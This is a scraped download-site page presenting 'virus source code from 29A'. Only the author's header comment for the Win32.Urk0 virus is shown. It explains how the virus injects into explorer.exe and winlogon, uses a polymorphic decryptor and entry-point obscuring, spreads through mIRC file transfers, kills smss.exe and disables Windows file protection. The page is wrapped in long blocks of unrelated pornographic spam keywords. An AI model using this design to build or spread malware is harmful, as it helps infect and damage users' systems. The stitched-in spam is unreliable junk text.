亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? 29a-7.010

?? 從29A上收集的病毒源碼
?? 010
字號:

;THIS IS A VIRUS SOURCE CODE.NOW,THIS FILE ITS NOT DANGER.IM NOT RESPONSABLE OF DAMAGES
;IN CASE YOU COMPILE AND LINK IT TO CREATE A EXECUTABLE.THIS CODE IS ONLY FOR ENTERTAIMENT
;AND EDUCATION.
;I KNOW THIS CODE COULD TO HAVE (AND IM 99% SURE IT HAS) BUGS. I CODED IT ONLY FOR 
;FUN, I NO WANT THIS VIRUS INFECTED COMPUTERS UNLESS YOU DID IT FOR UR ELECTION SO
;IM NOT REALLY WORRIED COZ THIS VIRUS IS NOT DONE FOR CORRUPT A SYSTEM.  
;
;win32.Urk0 (Lady Marian 3)
;This is a Win32 virus.
;
;Win9x:
;It uses a method that i havent seen in other viruses.Second part of virus(where it 
;polymorphs decryptor,infects,...) is descrypted and copied directly to other process
;that previously it creates(ill try it was a process created from a random file but for
;now it do it with explorer.exe) suspended.Then it unprotect mem of primary module of
;process with VirtualProtectEx and overwrite process mem with its code since entrypoint
;of new process.Then we reanude thread of created process so virus is executed in other 
;process.This can be made MAX_DEPTH times.Explorer creates other process and inject there 
;its code,and again and again and again...for MAX_DEPTH times.
;I think this difficults emulation and debugging.In addition if a 
;memory monitor detects a virus behaviour in memory it detects virus as other file
;(for now explorer.exe).
;Note virus never infects explorer.exe in disk,only in memory,so if virus is searched in 
;explorer.exe it is not found.In addition when i create new process i pass 
;CREATE_NEW_PROCESS_GROUP flag so new process is created without father...
;suppostly there isnt relation between creator process and new process.  
;In addition when virus is executing in explorer.exe it calls to RegisterServiceProcess
;so user doesnt see two explorer.exe in task list.
;With this method we return the control to host fastly becoz slow part of virus is executed
;currently with host becoz it is executing in explorer.exe where we are injected our code.
;First part of virus is encrypted.Decryptor is polimorphed.Key is changed with each generation.
;Polymorphic engine its not very complex.It interchanges registers used and inserts 
;trash instructions.Trash uses recursively itself so we can find trash in this manner:
;
;xor reg32a,imm32a___
;add reg32b,imm32b_  |
;cli               | |
;clc               | |
;sub reg32b,imm32b_| |
;cli                 |
;cpuid               |
;...			   |
;xor reg32a,imm32a___|
;...
;
;I wanna do it better with a v2.0 of the virus :P
;Second part is encrypted with random key.Decryptor its not poly.However,virus doesnt
;modify its code directly becoz it,while is injecting code to explorer.exe,is 
;unencrypting bytes before injecting.
;It uses EPO method too.Insert a jmp(and ill insert some antidebugging trickz too)
;in entrypoint of infected file(later it restores bytes overwrited).
;Apis are gotten by CRC.
;For infection it adds itself at end of last section.Increase size of file infected.
;It only infects .exe files.
;For now Urk0 doesnt have payload(i dont know if i ll add it :-m )
;In addition Urk0 has two manners of infection.It can infect files with explorer code
;encrypted or withouth encrypting.If it isnt encrypted it have per-process characteristics.
;It works in the same manner but in addition it hooks CreateFileA api.
;It always infects mirc.exe file with per-process characteristics becoz mirc.exe use 
;CreateFileA to open files that it will send(with dcc) so ill infect files before sending
;and in this manner virus will arrive other computer ;)(With mirc.exe and others similar).
;If you read this code you will see i have spend a lot of bytes that i could have not
;spend it,becoz for now i have not optimizated the code.I must optimizate it and
;optmizate poly engine.
;Structure of code:
;
;      --------------------------------------SVirus
;      -----------------------SCode
;         (Entry point 2)
;         Code executed
;         after injecting
;         in explorer.exe
;         Encrypted with random. 
;	    Note if this part is
;         not encrypted some code
;         here can be executed 
;         before injecting to
;         explorer for 
;         perprocess propose
;      -----------------------ECode
;         (Entry point 1)
;         Decryptor of code since
;         Encrypted to EVirus		
;      -----------------------Encrypted
;         Here it creates process
;         explorer.exe and injects
;         code(unencrypting SCode
;         to ECode at same time it 
;         write each dword) to 
;         explorer.exe since entry
;         point of it.When it has
;         injected the code it reanude
;         explorer and infection part
;         and others important parts
;         are executed in explorer.exe
;         process.
;         Later it restore for EPO
;         overwrited bytes and jmp 
;         to host          
;      --------------------------------------EVirus
;
;WinNT:
;In NT machines virus works in a manner very different.In Nt,virus will try to get a 
;handle to winlogon.exe with full privileges,using a flaw in dbgss implemented in smss.exe
;(you can see debploit flaw in august archives,Nt focus,www.securiteam.com).Using this flaw
;we inject our code in winlogon.Note that with this flaw we have a problem,when we try to get
;a handle to winlogon with debploit method,winlogon will terminate when our program
;terminate too,becouse our program set as debugger of winlogon,and winlogon as debuggee,
;so if we attach winlogon,when we terminate,it will terminate too.For this reason,winlogon
;code will kill smss.exe.Ok,this is a dramatic solution,however i think system will work
;very well without smss.exe.Smss.exe loads winlogon.exe and user mode part of win32 ss 
;in memory,and when system hangs,it takes control and show typical blue screen.In addition,
;it have implemented dbgss so if we kill it,a lot of debugger will not run(mmm...is this a
;problem??? ;).I was working a lot of time in my system with smss.exe terminated and i think
;my system worked perfectly(i wasnt be able to use debuggers...only softice).
;well,when winlogon code kills smss.exe,it disables sfp with ratter and benny method(29a
;number 6).Later it gets a handle to explorer and injects the code there.In explorer,
;virus will infect current folder of explorer.exe in intervals of 60 seconds.
;Note virus use ModuleBase + 28h for infection mark.At this offset there are 5 reserved dwords
;in dos header.I think to put infection mark in this field is a few lame :P ... i could
;to have put it in second field of time date stamp or with others methods but im not worry
;for infection mark. 
;
;
;and that is all :)
;
;
;SORRY BECOZ MY ENGLISH LEVEL ITS VERY LOW SO I M SORRY IF YOU DONT UNDERSTAND SOME 
;EXPRESSIONS THAT I USE BADLY.HOWEVER ILL TRY TO WRITE BETTER I CAN :)
;
;I MUST TO APOLOGIZE TOO COZ MY BADLY MANNER OF PROGRAMMING. MY CODE IS NOT OPTIMIZED
;FOR FAST AND NOT OPTIMIZED FOR SIZE :P . IN ADDITION THIS IS A CRAZY CODE :S 
;REALLY,IF I HAD TO READ IT I WOULD BE VERY ANGRY WITH THE AUTHOR :P COZ PERHAPS THE CODE
;IS NOT VERY MUCH UNDERSTANDABLE. SORRY .
;
;
;THX TO:
;
;OF COURSE:  

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
精品乱码亚洲一区二区不卡| 91福利国产成人精品照片| 日韩欧美国产精品| 男男成人高潮片免费网站| 欧美一区二区人人喊爽| 日本不卡免费在线视频| 欧美v亚洲v综合ⅴ国产v| 国产精品一区二区免费不卡 | 欧美精品一区二区久久婷婷| 男女性色大片免费观看一区二区| 日韩一区二区三区免费观看| 精品无人码麻豆乱码1区2区| 日本一区二区三级电影在线观看 | 91麻豆精品国产自产在线观看一区| 亚洲国产欧美在线| 26uuu亚洲综合色欧美| 成人一区在线观看| 亚洲欧美乱综合| 欧美裸体bbwbbwbbw| 国产自产v一区二区三区c| 欧美国产精品一区| 欧美优质美女网站| 国产精品88av| 亚洲一区二区三区爽爽爽爽爽| 日韩亚洲欧美一区| 丁香六月综合激情| 亚洲电影中文字幕在线观看| 久久久久国产精品麻豆| 在线观看91精品国产入口| 久久国内精品自在自线400部| 国产日韩欧美综合在线| 欧美日韩一区二区三区四区| 国产伦精品一区二区三区免费| 综合久久久久综合| 欧美大片一区二区| 色欧美乱欧美15图片| 蜜乳av一区二区三区| 最新中文字幕一区二区三区| 日韩欧美一区二区久久婷婷| 色欧美日韩亚洲| 国产成人无遮挡在线视频| 日韩中文字幕一区二区三区| 亚洲天堂中文字幕| 久久众筹精品私拍模特| 欧美日韩国产美女| 91性感美女视频| 国产中文一区二区三区| 日韩制服丝袜先锋影音| 夜夜嗨av一区二区三区四季av | 国内精品在线播放| 一区二区三区在线影院| 久久免费的精品国产v∧| 欧美男人的天堂一二区| 色综合一区二区三区| 黄页视频在线91| 天天色天天爱天天射综合| 亚洲欧美二区三区| 亚洲国产精品v| 精品国产91洋老外米糕| 69堂成人精品免费视频| 欧美午夜片在线看| 色天天综合色天天久久| 成人激情视频网站| 国产成人精品影视| 国产成人自拍在线| 国内精品自线一区二区三区视频| 日日骚欧美日韩| 日韩高清不卡一区二区| 五月婷婷综合在线| 亚洲超碰精品一区二区| 亚洲大片在线观看| 亚洲v中文字幕| 五月婷婷欧美视频| 日本视频中文字幕一区二区三区| 亚洲主播在线播放| 亚洲成av人片在线观看无码| 亚洲第一二三四区| 日韩电影在线免费看| 丝袜a∨在线一区二区三区不卡| 亚洲成人av一区二区| 亚洲成人激情社区| 日韩精品一级中文字幕精品视频免费观看 | 成人午夜大片免费观看| 国产精品一区2区| 国产成人av电影在线播放| 国产 欧美在线| 北岛玲一区二区三区四区| 99久久精品情趣| 91免费看视频| 欧美日韩一区精品| 555www色欧美视频| 欧美成人伊人久久综合网| 久久在线免费观看| 国产精品国产三级国产普通话蜜臀 | 亚洲免费在线看| 一区二区三区av电影| 午夜精品久久久久| 精品亚洲成a人| 成人av集中营| 欧美色图激情小说| 久久综合九色欧美综合狠狠 | 欧美午夜寂寞影院| 日韩视频一区二区在线观看| 久久亚洲春色中文字幕久久久| 国产婷婷色一区二区三区 | 日韩av电影免费观看高清完整版在线观看| 视频一区视频二区中文字幕| 韩日av一区二区| 成人精品免费网站| 欧美日韩不卡一区| 久久九九久久九九| 亚洲欧美韩国综合色| 免费久久99精品国产| 国产精品亚洲一区二区三区妖精| 波多野结衣欧美| 欧美日韩电影一区| 欧美激情在线一区二区三区| 亚洲精品乱码久久久久| 精品无人区卡一卡二卡三乱码免费卡 | 一二三四社区欧美黄| 狠狠网亚洲精品| 99精品视频一区二区三区| 欧美一区二区三区精品| 国产精品视频一二三| 偷偷要91色婷婷| av网站免费线看精品| 欧美一级二级在线观看| 亚洲天堂精品在线观看| 久久99在线观看| 在线观看www91| 日本一区二区成人| 麻豆国产精品一区二区三区| 91麻豆成人久久精品二区三区| 欧美成va人片在线观看| 亚洲午夜久久久久中文字幕久| 国产成人在线观看免费网站| 欧美丰满少妇xxxbbb| 日韩一区在线看| 狠狠网亚洲精品| 制服丝袜国产精品| 亚洲精品自拍动漫在线| 国产91清纯白嫩初高中在线观看| 91精品欧美久久久久久动漫| 亚洲精品你懂的| 成人av在线一区二区| 精品久久久久一区二区国产| 亚洲二区在线视频| 色综合久久中文字幕综合网| 日本一区二区免费在线| 久久精品国产99久久6| 欧美美女网站色| 亚洲成av人片一区二区三区| 在线观看欧美精品| 亚洲欧美成人一区二区三区| 99riav久久精品riav| 国产精品污网站| 成人一道本在线| 国产精品免费人成网站| 国产成人精品免费在线| 欧美激情在线免费观看| 国产福利一区二区三区视频在线 | 国产iv一区二区三区| 欧美精品一区二区三区视频| 久久精品国产99国产| 欧美不卡在线视频| 国产一区在线观看麻豆| 精品成人私密视频| 国产乱一区二区| 中文字幕乱码日本亚洲一区二区| 国产精品一区免费在线观看| 久久久久久久综合| 国产精品自拍一区| 欧美国产一区视频在线观看| 丰满白嫩尤物一区二区| 中文字幕制服丝袜成人av| 成人免费毛片嘿嘿连载视频| 中文字幕av在线一区二区三区| 成人精品鲁一区一区二区| 中文字幕乱码亚洲精品一区| 97精品视频在线观看自产线路二| |精品福利一区二区三区| 一本到不卡精品视频在线观看| 伊人婷婷欧美激情| 欧美日韩精品一区二区在线播放| 视频一区免费在线观看| 精品国产一区二区三区忘忧草| 久88久久88久久久| 久久久91精品国产一区二区精品 | 亚洲最大的成人av| 欧美一区二区网站| 国产真实乱子伦精品视频| 欧美国产日本视频| 在线精品亚洲一区二区不卡| 天天射综合影视| 国产视频一区在线播放| 99视频超级精品| 亚洲国产精品久久艾草纯爱| 欧美一级国产精品| 丁香六月久久综合狠狠色| 亚洲不卡一区二区三区|